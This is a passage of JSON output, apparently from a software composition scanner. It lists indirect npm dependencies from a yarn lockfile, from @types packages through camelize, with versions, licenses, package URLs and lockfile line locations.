"@types/istanbul-lib-report@3.0.3" ], "Locations": [ { "StartLine": 2920, "EndLine": 2925 } ], "AnalyzedBy": "yarn" }, { "ID": "@types/minimist@1.2.5", "Name": "@types/minimist", "Identifier": { "PURL": "pkg:npm/%40types/minimist@1.2.5", "UID": "abb71b0a492b78ec" }, "Version": "1.2.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2940, "EndLine": 2943 } ], "AnalyzedBy": "yarn" }, { "ID": "@types/node@24.7.0", "Name": "@types/node", "Identifier": { "PURL": "pkg:npm/%40types/node@24.7.0", "UID": "778c23fb2f490d4f" }, "Version": "24.7.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "undici-types@7.14.0" ], "Locations": [ { "StartLine": 2945, "EndLine": 2950 } ], "AnalyzedBy": "yarn" }, { "ID": "@types/normalize-package-data@2.4.4", "Name": "@types/normalize-package-data", "Identifier": { "PURL": "pkg:npm/%40types/normalize-package-data@2.4.4", "UID": "232024d82b1c5783" }, "Version": "2.4.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2952, "EndLine": 2955 } ], "AnalyzedBy": "yarn" }, { "ID": "@types/stack-utils@2.0.3", "Name": "@types/stack-utils", "Identifier": { "PURL": "pkg:npm/%40types/stack-utils@2.0.3", "UID": "b8deef696cd529bd" }, "Version": "2.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2998, "EndLine": 3001 } ], "AnalyzedBy": "yarn" }, { "ID": "@types/use-sync-external-store@0.0.6", "Name": "@types/use-sync-external-store", "Identifier": { "PURL": "pkg:npm/%40types/use-sync-external-store@0.0.6", "UID": "210fdd2f64eb62e2" }, "Version": "0.0.6", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3003, "EndLine": 3006 } ], "AnalyzedBy": "yarn" }, { "ID": "@types/yargs@17.0.33", "Name": "@types/yargs", "Identifier": { "PURL": "pkg:npm/%40types/yargs@17.0.33", "UID": "2a2e2e4b8e4d977b" }, "Version": "17.0.33", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@types/yargs-parser@21.0.3" ], "Locations": [ { "StartLine": 3013, "EndLine": 3018 } ], "AnalyzedBy": "yarn" }, { "ID": "@types/yargs-parser@21.0.3", "Name": "@types/yargs-parser", "Identifier": { "PURL": "pkg:npm/%40types/yargs-parser@21.0.3", "UID": "b69e14ff9ff2b4e3" }, "Version": "21.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3008, "EndLine": 3011 } ], "AnalyzedBy": "yarn" }, { "ID": "@vscode/sudo-prompt@9.3.1", "Name": "@vscode/sudo-prompt", "Identifier": { "PURL": "pkg:npm/%40vscode/sudo-prompt@9.3.1", "UID": "80638b4a646b7201" }, "Version": "9.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3154, "EndLine": 3157 } ], "AnalyzedBy": "yarn" }, { "ID": "@xmldom/xmldom@0.8.11", "Name": "@xmldom/xmldom", "Identifier": { "PURL": "pkg:npm/%40xmldom/xmldom@0.8.11", "UID": "df38f0b8448f89b9" }, "Version": "0.8.11", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3159, "EndLine": 3162 } ], "AnalyzedBy": "yarn" }, { "ID": "abbrev@3.0.1", "Name": "abbrev", "Identifier": { "PURL": "pkg:npm/abbrev@3.0.1", "UID": "8c80caac6f425bc1" }, "Version": "3.0.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3169, "EndLine": 3170 } ], "AnalyzedBy": "yarn" }, { "ID": "abort-controller@3.0.0", "Name": "abort-controller", "Identifier": { "PURL": "pkg:npm/abort-controller@3.0.0", "UID": "8930785d9d83d35a" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "event-target-shim@5.0.1" ], "Locations": [ { "StartLine": 3177, "EndLine": 3182 } ], "AnalyzedBy": "yarn" }, { "ID": "accepts@1.3.8", "Name": "accepts", "Identifier": { "PURL": "pkg:npm/accepts@1.3.8", "UID": "ad59e1d98e21520e" }, "Version": "1.3.8", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "mime-types@2.1.35", "negotiator@0.6.3" ], "Locations": [ { "StartLine": 3184, "EndLine": 3190 } ], "AnalyzedBy": "yarn" }, { "ID": "acorn@8.15.0", "Name": "acorn", "Identifier": { "PURL": "pkg:npm/acorn@8.15.0", "UID": "5bc4e8bb9f41f235" }, "Version": "8.15.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3197, "EndLine": 3200 } ], "AnalyzedBy": "yarn" }, { "ID": "agent-base@7.1.4", "Name": "agent-base", "Identifier": { "PURL": "pkg:npm/agent-base@7.1.4", "UID": "8b9be32dad21fc7f" }, "Version": "7.1.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3209, "EndLine": 3212 } ], "AnalyzedBy": "yarn" }, { "ID": "anser@1.4.10", "Name": "anser", "Identifier": { "PURL": "pkg:npm/anser@1.4.10", "UID": "e8e56afef3ddc730" }, "Version": "1.4.10", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3246, "EndLine": 3249 } ], "AnalyzedBy": "yarn" }, { "ID": "ansi-regex@2.1.1", "Name": "ansi-regex", "Identifier": { "PURL": "pkg:npm/ansi-regex@2.1.1", "UID": "710743c030454fa5" }, "Version": "2.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3267, "EndLine": 3270 } ], "AnalyzedBy": "yarn" }, { "ID": "ansi-regex@5.0.1", "Name": "ansi-regex", "Identifier": { "PURL": "pkg:npm/ansi-regex@5.0.1", "UID": "4fa61b4a7fa11785" }, "Version": "5.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3277, "EndLine": 3280 } ], "AnalyzedBy": "yarn" }, { "ID": "ansi-regex@6.2.2", "Name": "ansi-regex", "Identifier": { "PURL": "pkg:npm/ansi-regex@6.2.2", "UID": "277f3413bc9d6cf9" }, "Version": "6.2.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3282, "EndLine": 3285 } ], "AnalyzedBy": "yarn" }, { "ID": "ansi-styles@3.2.1", "Name": "ansi-styles", "Identifier": { "PURL": "pkg:npm/ansi-styles@3.2.1", "UID": "201ea8111e2ba751" }, "Version": "3.2.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "color-convert@1.9.3" ], "Locations": [ { "StartLine": 3294, "EndLine": 3299 } ], "AnalyzedBy": "yarn" }, { "ID": "ansi-styles@4.3.0", "Name": "ansi-styles", "Identifier": { "PURL": "pkg:npm/ansi-styles@4.3.0", "UID": "d18cd365801425e6" }, "Version": "4.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "color-convert@2.0.1" ], "Locations": [ { "StartLine": 3301, "EndLine": 3306 } ], "AnalyzedBy": "yarn" }, { "ID": "ansi-styles@5.2.0", "Name": "ansi-styles", "Identifier": { "PURL": "pkg:npm/ansi-styles@5.2.0", "UID": "4e779cb272d4135" }, "Version": "5.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3308, "EndLine": 3311 } ], "AnalyzedBy": "yarn" }, { "ID": "ansi-styles@6.2.3", "Name": "ansi-styles", "Identifier": { "PURL": "pkg:npm/ansi-styles@6.2.3", "UID": "9bf0fbb47200a3c8" }, "Version": "6.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3313, "EndLine": 3316 } ], "AnalyzedBy": "yarn" }, { "ID": "anymatch@3.1.3", "Name": "anymatch", "Identifier": { "PURL": "pkg:npm/anymatch@3.1.3", "UID": "aeaf126e15fc33c" }, "Version": "3.1.3", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "normalize-path@3.0.0", "picomatch@2.3.1" ], "Locations": [ { "StartLine": 3318, "EndLine": 3324 } ], "AnalyzedBy": "yarn" }, { "ID": "appdirsjs@1.2.7", "Name": "appdirsjs", "Identifier": { "PURL": "pkg:npm/appdirsjs@1.2.7", "UID": "841c804ef1a69ffe" }, "Version": "1.2.7", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3326, "EndLine": 3329 } ], "AnalyzedBy": "yarn" }, { "ID": "aproba@1.2.0", "Name": "aproba", "Identifier": { "PURL": "pkg:npm/aproba@1.2.0", "UID": "bea133996a7db833" }, "Version": "1.2.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3331, "EndLine": 3334 } ], "AnalyzedBy": "yarn" }, { "ID": "aproba@2.1.0", "Name": "aproba", "Identifier": { "PURL": "pkg:npm/aproba@2.1.0", "UID": "7f87d208e1602cd" }, "Version": "2.1.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3336, "EndLine": 3339 } ], "AnalyzedBy": "yarn" }, { "ID": "archy@1.0.0", "Name": "archy", "Identifier": { "PURL": "pkg:npm/archy@1.0.0", "UID": "6bd8f39a345572c5" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3341, "EndLine": 3344 } ], "AnalyzedBy": "yarn" }, { "ID": "are-we-there-yet@1.1.7", "Name": "are-we-there-yet", "Identifier": { "PURL": "pkg:npm/are-we-there-yet@1.1.7", "UID": "b334386894180b93" }, "Version": "1.1.7", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "delegates@1.0.0", "readable-stream@2.3.8" ], "Locations": [ { "StartLine": 3354, "EndLine": 3360 } ], "AnalyzedBy": "yarn" }, { "ID": "argparse@1.0.10", "Name": "argparse", "Identifier": { "PURL": "pkg:npm/argparse@1.0.10", "UID": "474cd57033f81e9a" }, "Version": "1.0.10", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "sprintf-js@1.0.3" ], "Locations": [ { "StartLine": 3362, "EndLine": 3367 } ], "AnalyzedBy": "yarn" }, { "ID": "argparse@2.0.1", "Name": "argparse", "Identifier": { "PURL": "pkg:npm/argparse@2.0.1", "UID": "944b6fb6b036a122" }, "Version": "2.0.1", "Licenses": [ "Python-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3369, "EndLine": 3372 } ], "AnalyzedBy": "yarn" }, { "ID": "argsarray@0.0.1", "Name": "argsarray", "Identifier": { "PURL": "pkg:npm/argsarray@0.0.1", "UID": "8c6d4d11b4b4e559" }, "Version": "0.0.1", "Licenses": [ "WTFPL" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3374, "EndLine": 3377 } ], "AnalyzedBy": "yarn" }, { "ID": "arrify@1.0.1", "Name": "arrify", "Identifier": { "PURL": "pkg:npm/arrify@1.0.1", "UID": "7c355d3119954cf" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3462, "EndLine": 3465 } ], "AnalyzedBy": "yarn" }, { "ID": "asap@2.0.6", "Name": "asap", "Identifier": { "PURL": "pkg:npm/asap@2.0.6", "UID": "2fe1139f3d7c65b2" }, "Version": "2.0.6", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3467, "EndLine": 3470 } ], "AnalyzedBy": "yarn" }, { "ID": "async-limiter@1.0.1", "Name": "async-limiter", "Identifier": { "PURL": "pkg:npm/async-limiter@1.0.1", "UID": "c447cac5f10a0f5d" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3482, "EndLine": 3485 } ], "AnalyzedBy": "yarn" }, { "ID": "asynckit@0.4.0", "Name": "asynckit", "Identifier": { "PURL": "pkg:npm/asynckit@0.4.0", "UID": "62bfc470d5ccbf31" }, "Version": "0.4.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3487, "EndLine": 3490 } ], "AnalyzedBy": "yarn" }, { "ID": "available-typed-arrays@1.0.7", "Name": "available-typed-arrays", "Identifier": { "PURL": "pkg:npm/available-typed-arrays@1.0.7", "UID": "6f67fcaf542944fe" }, "Version": "1.0.7", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "possible-typed-array-names@1.1.0" ], "Locations": [ { "StartLine": 3492, "EndLine": 3497 } ], "AnalyzedBy": "yarn" }, { "ID": "b4a@1.7.3", "Name": "b4a", "Identifier": { "PURL": "pkg:npm/b4a@1.7.3", "UID": "f6ee978d200c1cfe" }, "Version": "1.7.3", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3508, "EndLine": 3511 } ], "AnalyzedBy": "yarn" }, { "ID": "babel-jest@29.7.0", "Name": "babel-jest", "Identifier": { "PURL": "pkg:npm/babel-jest@29.7.0", "UID": "afc0605b79cdd875" }, "Version": "29.7.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@jest/transform@29.7.0", "@types/babel__core@7.20.5", "babel-plugin-istanbul@6.1.1", "babel-preset-jest@29.6.3", "chalk@4.1.2", "graceful-fs@4.2.11", "slash@3.0.0" ], "Locations": [ { "StartLine": 3513, "EndLine": 3524 } ], "AnalyzedBy": "yarn" }, { "ID": "babel-plugin-istanbul@6.1.1", "Name": "babel-plugin-istanbul", "Identifier": { "PURL": "pkg:npm/babel-plugin-istanbul@6.1.1", "UID": "aaecefb526190572" }, "Version": "6.1.1", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/helper-plugin-utils@7.27.1", "@istanbuljs/load-nyc-config@1.1.0", "@istanbuljs/schema@0.1.3", "istanbul-lib-instrument@5.2.1", "test-exclude@6.0.0" ], "Locations": [ { "StartLine": 3533, "EndLine": 3542 } ], "AnalyzedBy": "yarn" }, { "ID": "babel-plugin-jest-hoist@29.6.3", "Name": "babel-plugin-jest-hoist", "Identifier": { "PURL": "pkg:npm/babel-plugin-jest-hoist@29.6.3", "UID": "f4241ec4cd342cbd" }, "Version": "29.6.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/template@7.27.2", "@babel/types@7.28.4", "@types/babel__core@7.20.5", "@types/babel__traverse@7.28.0" ], "Locations": [ { "StartLine": 3544, "EndLine": 3552 } ], "AnalyzedBy": "yarn" }, { "ID": "babel-plugin-syntax-hermes-parser@0.29.1", "Name": "babel-plugin-syntax-hermes-parser", "Identifier": { "PURL": "pkg:npm/babel-plugin-syntax-hermes-parser@0.29.1", "UID": "ba7495bea430e32f" }, "Version": "0.29.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "hermes-parser@0.29.1" ], "Locations": [ { "StartLine": 3589, "EndLine": 3594 } ], "AnalyzedBy": "yarn" }, { "ID": "babel-preset-current-node-syntax@1.2.0", "Name": "babel-preset-current-node-syntax", "Identifier": { "PURL": "pkg:npm/babel-preset-current-node-syntax@1.2.0", "UID": "2f0427ec888a61fc" }, "Version": "1.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/plugin-syntax-async-generators@7.8.4", "@babel/plugin-syntax-bigint@7.8.3", "@babel/plugin-syntax-class-properties@7.12.13", "@babel/plugin-syntax-class-static-block@7.14.5", "@babel/plugin-syntax-import-attributes@7.27.1", "@babel/plugin-syntax-import-meta@7.10.4", "@babel/plugin-syntax-json-strings@7.8.3", "@babel/plugin-syntax-logical-assignment-operators@7.10.4", "@babel/plugin-syntax-nullish-coalescing-operator@7.8.3", "@babel/plugin-syntax-numeric-separator@7.10.4", "@babel/plugin-syntax-object-rest-spread@7.8.3", "@babel/plugin-syntax-optional-catch-binding@7.8.3", "@babel/plugin-syntax-optional-chaining@7.8.3", "@babel/plugin-syntax-private-property-in-object@7.14.5", "@babel/plugin-syntax-top-level-await@7.14.5" ], "Locations": [ { "StartLine": 3603, "EndLine": 3622 } ], "AnalyzedBy": "yarn" }, { "ID": "babel-preset-jest@29.6.3", "Name": "babel-preset-jest", "Identifier": { "PURL": "pkg:npm/babel-preset-jest@29.6.3", "UID": "daf05e4c6b491123" }, "Version": "29.6.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "babel-plugin-jest-hoist@29.6.3", "babel-preset-current-node-syntax@1.2.0" ], "Locations": [ { "StartLine": 3624, "EndLine": 3630 } ], "AnalyzedBy": "yarn" }, { "ID": "balanced-match@1.0.2", "Name": "balanced-match", "Identifier": { "PURL": "pkg:npm/balanced-match@1.0.2", "UID": "6f7bd1a9352c85d4" }, "Version": "1.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3632, "EndLine": 3635 } ], "AnalyzedBy": "yarn" }, { "ID": "bare-events@2.7.0", "Name": "bare-events", "Identifier": { "PURL": "pkg:npm/bare-events@2.7.0", "UID": "32ab67e75182bb2a" }, "Version": "2.7.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3637, "EndLine": 3640 } ], "AnalyzedBy": "yarn" }, { "ID": "base-64@0.1.0", "Name": "base-64", "Identifier": { "PURL": "pkg:npm/base-64@0.1.0", "UID": "d293ea3176fedea8" }, "Version": "0.1.0", "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3689, "EndLine": 3692 } ], "AnalyzedBy": "yarn" }, { "ID": "base64-arraybuffer@1.0.2", "Name": "base64-arraybuffer", "Identifier": { "PURL": "pkg:npm/base64-arraybuffer@1.0.2", "UID": "8e0795ef4928f692" }, "Version": "1.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3694, "EndLine": 3697 } ], "AnalyzedBy": "yarn" }, { "ID": "base64-js@1.5.1", "Name": "base64-js", "Identifier": { "PURL": "pkg:npm/base64-js@1.5.1", "UID": "a51e0440680bf68a" }, "Version": "1.5.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3699, "EndLine": 3702 } ], "AnalyzedBy": "yarn" }, { "ID": "baseline-browser-mapping@2.8.13", "Name": "baseline-browser-mapping", "Identifier": { "PURL": "pkg:npm/baseline-browser-mapping@2.8.13", "UID": "5d6dfccbfa5ea84" }, "Version": "2.8.13", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3704, "EndLine": 3707 } ], "AnalyzedBy": "yarn" }, { "ID": "big-integer@1.6.52", "Name": "big-integer", "Identifier": { "PURL": "pkg:npm/big-integer@1.6.52", "UID": "e32547be9b593839" }, "Version": "1.6.52", "Licenses": [ "Unlicense" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3709, "EndLine": 3712 } ], "AnalyzedBy": "yarn" }, { "ID": "bin-links@5.0.0", "Name": "bin-links", "Identifier": { "PURL": "pkg:npm/bin-links@5.0.0", "UID": "cfed9cf5466c5cee" }, "Version": "5.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "cmd-shim@7.0.0", "npm-normalize-package-bin@4.0.0", "proc-log@5.0.0", "read-cmd-shim@5.0.0", "write-file-atomic@6.0.0" ], "Locations": [ { "StartLine": 3714, "EndLine": 3721 } ], "AnalyzedBy": "yarn" }, { "ID": "binary-extensions@3.1.0", "Name": "binary-extensions", "Identifier": { "PURL": "pkg:npm/binary-extensions@3.1.0", "UID": "7ea691e0cb337a00" }, "Version": "3.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3723, "EndLine": 3726 } ], "AnalyzedBy": "yarn" }, { "ID": "bl@4.1.0", "Name": "bl", "Identifier": { "PURL": "pkg:npm/bl@4.1.0", "UID": "8b533000d21c9994" }, "Version": "4.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "buffer@5.7.1", "inherits@2.0.4", "readable-stream@3.6.2" ], "Locations": [ { "StartLine": 3735, "EndLine": 3742 } ], "AnalyzedBy": "yarn" }, { "ID": "boolbase@1.0.0", "Name": "boolbase", "Identifier": { "PURL": "pkg:npm/boolbase@1.0.0", "UID": "364e8d6e4ebe6b19" }, "Version": "1.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3762, "EndLine": 3765 } ], "AnalyzedBy": "yarn" }, { "ID": "bplist-creator@0.1.0", "Name": "bplist-creator", "Identifier": { "PURL": "pkg:npm/bplist-creator@0.1.0", "UID": "72595fd4e87a2ca9" }, "Version": "0.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "stream-buffers@2.2.0" ], "Locations": [ { "StartLine": 3767, "EndLine": 3772 } ], "AnalyzedBy": "yarn" }, { "ID": "bplist-parser@0.3.1", "Name": "bplist-parser", "Identifier": { "PURL": "pkg:npm/bplist-parser@0.3.1", "UID": "ebdd1035f0789ced" }, "Version": "0.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "big-integer@1.6.52" ], "Locations": [ { "StartLine": 3774, "EndLine": 3779 } ], "AnalyzedBy": "yarn" }, { "ID": "brace-expansion@1.1.12", "Name": "brace-expansion", "Identifier": { "PURL": "pkg:npm/brace-expansion@1.1.12", "UID": "972621d048eefceb" }, "Version": "1.1.12", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "balanced-match@1.0.2", "concat-map@0.0.1" ], "Locations": [ { "StartLine": 3781, "EndLine": 3787 } ], "AnalyzedBy": "yarn" }, { "ID": "brace-expansion@2.0.2", "Name": "brace-expansion", "Identifier": { "PURL": "pkg:npm/brace-expansion@2.0.2", "UID": "5e453dd69b965804" }, "Version": "2.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "balanced-match@1.0.2" ], "Locations": [ { "StartLine": 3789, "EndLine": 3794 } ], "AnalyzedBy": "yarn" }, { "ID": "braces@3.0.3", "Name": "braces", "Identifier": { "PURL": "pkg:npm/braces@3.0.3", "UID": "d637e8d71b109b9a" }, "Version": "3.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "fill-range@7.1.1" ], "Locations": [ { "StartLine": 3796, "EndLine": 3801 } ], "AnalyzedBy": "yarn" }, { "ID": "browserslist@4.26.3", "Name": "browserslist", "Identifier": { "PURL": "pkg:npm/browserslist@4.26.3", "UID": "9a74e79e111d9f0a" }, "Version": "4.26.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "baseline-browser-mapping@2.8.13", "caniuse-lite@1.0.30001749", "electron-to-chromium@1.5.233", "node-releases@2.0.23", "update-browserslist-db@1.1.3" ], "Locations": [ { "StartLine": 3803, "EndLine": 3812 } ], "AnalyzedBy": "yarn" }, { "ID": "bser@2.1.1", "Name": "bser", "Identifier": { "PURL": "pkg:npm/bser@2.1.1", "UID": "135077a78ef7fb4f" }, "Version": "2.1.1", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "node-int64@0.4.0" ], "Locations": [ { "StartLine": 3814, "EndLine": 3819 } ], "AnalyzedBy": "yarn" }, { "ID": "buffer@5.7.1", "Name": "buffer", "Identifier": { "PURL": "pkg:npm/buffer@5.7.1", "UID": "ad55ae4be12e626f" }, "Version": "5.7.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "base64-js@1.5.1", "ieee754@1.2.1" ], "Locations": [ { "StartLine": 3826, "EndLine": 3832 } ], "AnalyzedBy": "yarn" }, { "ID": "buffer@6.0.3", "Name": "buffer", "Identifier": { "PURL": "pkg:npm/buffer@6.0.3", "UID": "95d2edd929bc27cf" }, "Version": "6.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "base64-js@1.5.1", "ieee754@1.2.1" ], "Locations": [ { "StartLine": 3834, "EndLine": 3840 } ], "AnalyzedBy": "yarn" }, { "ID": "buffer-from@1.1.2", "Name": "buffer-from", "Identifier": { "PURL": "pkg:npm/buffer-from@1.1.2", "UID": "58a51371932dd19" }, "Version": "1.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3821, "EndLine": 3824 } ], "AnalyzedBy": "yarn" }, { "ID": "cacache@19.0.1", "Name": "cacache", "Identifier": { "PURL": "pkg:npm/cacache@19.0.1", "UID": "c208e8bf97b1cbf0" }, "Version": "19.0.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@npmcli/fs@4.0.0", "fs-minipass@3.0.3", "glob@10.4.5", "lru-cache@10.4.3", "minipass@7.1.2", "minipass-collect@2.0.1", "minipass-flush@1.0.5", "minipass-pipeline@1.2.4", "p-map@7.0.3", "ssri@12.0.0", "tar@7.5.1", "unique-filename@4.0.0" ], "Locations": [ { "StartLine": 3871, "EndLine": 3885 } ], "AnalyzedBy": "yarn" }, { "ID": "cacache@20.0.1", "Name": "cacache", "Identifier": { "PURL": "pkg:npm/cacache@20.0.1", "UID": "17d9bbd7208a5495" }, "Version": "20.0.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@npmcli/fs@4.0.0", "fs-minipass@3.0.3", "glob@11.0.3", "lru-cache@11.2.2", "minipass@7.1.2", "minipass-collect@2.0.1", "minipass-flush@1.0.5", "minipass-pipeline@1.2.4", "p-map@7.0.3", "ssri@12.0.0", "unique-filename@4.0.0" ], "Locations": [ { "StartLine": 3887, "EndLine": 3900 } ], "AnalyzedBy": "yarn" }, { "ID": "call-bind@1.0.8", "Name": "call-bind", "Identifier": { "PURL": "pkg:npm/call-bind@1.0.8", "UID": "6f0b0251cc3cab23" }, "Version": "1.0.8", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "call-bind-apply-helpers@1.0.2", "es-define-property@1.0.1", "get-intrinsic@1.3.0", "set-function-length@1.2.2" ], "Locations": [ { "StartLine": 3910, "EndLine": 3918 } ], "AnalyzedBy": "yarn" }, { "ID": "call-bind-apply-helpers@1.0.2", "Name": "call-bind-apply-helpers", "Identifier": { "PURL": "pkg:npm/call-bind-apply-helpers@1.0.2", "UID": "ee538c12e6f2c959" }, "Version": "1.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "es-errors@1.3.0", "function-bind@1.1.2" ], "Locations": [ { "StartLine": 3902, "EndLine": 3908 } ], "AnalyzedBy": "yarn" }, { "ID": "call-bound@1.0.4", "Name": "call-bound", "Identifier": { "PURL": "pkg:npm/call-bound@1.0.4", "UID": "34200b601888b3b9" }, "Version": "1.0.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "call-bind-apply-helpers@1.0.2", "get-intrinsic@1.3.0" ], "Locations": [ { "StartLine": 3920, "EndLine": 3926 } ], "AnalyzedBy": "yarn" }, { "ID": "callsites@3.1.0", "Name": "callsites", "Identifier": { "PURL": "pkg:npm/callsites@3.1.0", "UID": "52140db76ac1ceb6" }, "Version": "3.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3928, "EndLine": 3931 } ], "AnalyzedBy": "yarn" }, { "ID": "camelcase@5.3.1", "Name": "camelcase", "Identifier": { "PURL": "pkg:npm/camelcase@5.3.1", "UID": "62c73c9a5803ff4d" }, "Version": "5.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3942, "EndLine": 3945 } ], "AnalyzedBy": "yarn" }, { "ID": "camelcase@6.3.0", "Name": "camelcase", "Identifier": { "PURL": "pkg:npm/camelcase@6.3.0", "UID": "d9bff9fd628abd2e" }, "Version": "6.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3947, "EndLine": 3950 } ], "AnalyzedBy": "yarn" }, { "ID": "camelcase-keys@6.2.2", "Name": "camelcase-keys", "Identifier": { "PURL": "pkg:npm/camelcase-keys@6.2.2", "UID": "d6cd06d48236c199" }, "Version": "6.2.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "camelcase@5.3.1", "map-obj@4.3.0", "quick-lru@4.0.1" ], "Locations": [ { "StartLine": 3933, "EndLine": 3940 } ], "AnalyzedBy": "yarn" }, { "ID": "camelize@1.0.1", "Name": "camelize", "Identifier": { "PURL": "pkg:npm/camelize@1.0.1", "UID": "74447c8256a48095" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3952, "EndLine": 3955 } ], "AnalyzedBy": 